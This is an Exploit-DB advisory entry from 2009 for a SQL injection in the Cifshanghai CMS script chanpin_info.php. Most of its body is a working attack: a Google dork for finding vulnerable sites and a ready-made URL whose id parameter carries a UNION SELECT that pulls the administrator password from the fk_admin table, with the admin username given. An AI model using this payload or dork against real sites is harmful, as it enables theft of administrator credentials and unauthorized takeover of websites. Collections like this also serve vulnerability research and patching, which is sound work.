Cifshanghai chanpin_info.php CMS SQL Injection

2009-11-16T00:00:00
ID EDB-ID:10105
Type exploitdb
Reporter ProF.Code
Modified 2009-11-16T00:00:00

Description

Cifshanghai (chanpin_info.php) CMS SQL Injection. Webapps exploit for php platform

                                        
                                            =====================================
| cifshanghai.com script The news (chanpin_info.php) by pass
=====================================
Author: ProF.Code
Email : adt@hotmail.com
~~~~~~~~~~~~~~~~~~~~
dork(google) : "Powered by cifshanghai.com"
~~~~~~~~~~~~~~~~~~~~
demo: http://server/chanpin_info.php?showlei=&Leiid=&n=1&id=-177+union+select+1,password,3,4,5,6,7,8+from+fk_admin
user : admin
pass : From site :D